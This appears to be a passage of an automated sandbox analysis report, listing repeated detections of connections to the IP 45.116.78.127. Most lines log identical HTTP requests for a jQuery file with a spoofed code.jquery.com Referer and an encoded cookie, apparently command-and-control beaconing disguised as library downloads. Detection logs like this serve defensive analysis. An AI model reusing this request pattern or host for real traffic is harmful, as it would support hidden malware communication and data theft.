        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
